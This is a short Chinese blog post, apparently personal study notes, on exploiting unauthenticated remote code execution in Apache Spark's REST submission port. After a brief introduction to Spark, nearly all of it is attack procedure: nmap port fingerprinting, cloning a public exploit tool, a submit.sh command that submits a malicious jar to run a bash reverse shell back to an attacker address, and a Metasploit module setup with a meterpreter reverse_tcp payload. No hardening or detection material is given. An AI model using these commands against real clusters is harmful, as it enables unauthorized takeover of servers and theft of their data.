spark未授权RCE漏洞学习

Spark简介



spark是一个实现快速通用的集群计算平台。它是由加州大学伯克利分校AMP实验室 开发的通用内存并行计算框架,用来构建大型的、低延迟的数据分析应用程序。它扩展了广泛使用的MapReduce计算模型。高效的支撑更多计算模式,包括交互式查询和流处理。spark的一个主要特点是能够在内存中进行计算,及时依赖磁盘进行复杂的运算,Spark依然比MapReduce更加高效。

Spark未授权



信息探测


nmap扫描出先如下端口开放,则很有可能

6066/tcp  open  http           Jetty 9.3.z-SNAPSHOT
8081/tcp  open  http           Jetty 9.3.z-SNAPSHOT
8082/tcp  open  http           Jetty 9.3.z-SNAPSHOT

验证如图

下载攻击组件或使用MSF


下载地址:git clone https://github.com/aRe00t/rce-over-spark.git

jar工具使用说明


./submit.sh 192.168.100.2:6066 2.3.1 https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar "bash -i >& /dev/tcp/192.168.100.1/8888 0>&1"

反弹shell效果:

msf工具


msf5>use exploit/linux/http/spark_unauth_rce
msf5>set payload java/meterpreter/reverse_tcp
msf5>set rhost 192.168.100.2
msf5>set rport 6066
msf5>set lhost 192.168.100.1
msf5>set lport 4444
msf5>set srvhost 192.168.100.1
msf5>set srvport 8080
msf5>exploit 
posted @ 2019-02-19 11:14  挖洞的土拨鼠  阅读(2106)  评论(0编辑  收藏